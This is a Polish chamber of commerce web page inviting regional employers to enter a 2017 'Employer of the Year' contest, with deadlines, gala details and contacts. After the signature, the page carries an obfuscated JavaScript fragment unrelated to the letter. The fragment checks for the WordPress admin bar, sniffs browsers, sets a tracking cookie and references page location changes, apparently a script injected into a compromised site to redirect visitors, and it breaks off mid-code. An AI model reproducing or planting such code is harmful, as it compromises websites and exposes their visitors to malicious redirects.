Konkurs Pracodawca Roku Pomorza Środkowego | Północna Izba Gospodarcza w Koszalinie

Koszalin, dnia 2 czerwca 2017 r.

Szanowni Państwo,

Środkowopomorski rynek pracy w ostatnich latach silnie ewoluował, na co wpływ miały lokalne inwestycje zagraniczne, ujemna demografia, a także odpływ specjalistów za granicę i do innych ośrodków miejskich. W regionie zaczęło brakować nie tylko specjalistów i rzemieślników, ale również pracowników biurowych, produkcyjnych i fizycznych. W rezultacie, zarządzanie zasobami ludzkimi, a zwłaszcza rekrutacja, utrzymanie i rozwój kadr, stały się dziś głównymi bolączkami pracodawców, którzy coraz mocniej konkurują ze sobą walcząc o wartościowych pracowników.

Szukając rozwiązania dla tych problemów, Północna Izba Gospodarcza w Koszalinie wraz z partnerami podjęła działania zaradcze w formie organizowanego po raz pierwszy plebiscytu na Pracodawcę Roku. Celem konkursu jest promowanie Pomorza Środkowego jako regionu oferującego miejsca pracy w konkretnych przedsiębiorstwach, gwarantującym pracownikom sukces zawodowy i rozwój kariery.

Dlaczego warto wziąć udział w tym wydarzeniu?

Laury naszego plebiscytu są doskonałą wskazówką dla osób poszukujących pracy. Tytuł „Pracodawcy Roku” jest gwarancją rzetelności przedsiębiorstwa dla szukających stałego zatrudnienia na godnych warunkach, podnosi rangę przedsiębiorstwa na rynku pracy i jest magnesem silnie przyciągającym najlepsze kadry.

Ponadto, chcemy docenić firmy, które w swojej codziennej pracy kierują się zasadami etyki i społecznej odpowiedzialności biznesu. Szczególnie zależy nam by firmy godne naśladowania wyszły z cienia i budowały markę gospodarczą naszego regionu.

Serdecznie zapraszamy do udziału w Konkursie

Termin składania zgłoszeń upływa w dniu 15 sierpnia 2017 roku. Pod linkami przesyłam regulamin oraz formularze zgłoszeniowe.

Gala

Warto dodać, że ukoronowaniem plebiscytu będzie Gala Północnej Izby Gospodarczej w Koszalinie podczas której, nastąpi wręczenie statuetek „Pracodawca Roku Pomorza Środkowego” najlepszym pracodawcom w regionie. Oczy środkowopomorskiego biznesu skierowane będą w stronę zwycięzców, a swoją obecnością zaszczycą nas znamienici goście oraz przedstawiciele lokalnych władz i instytucji.

Wydarzenie będzie miało miejsce w zabytkowym Bursztynowym Pałacu w Strzekęcinie opodal Koszalina.

W przypadku dodatkowych pytań lub wątpliwości proszę o kontakt z Panem Arkadiuszem Ługowskim z Biura Izby pod nr tel. 94-341-10-83, tel. 537-184-630 lub mailowo koszalin@izba.info.

 

Z poważaniem

Roman Biłas
Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m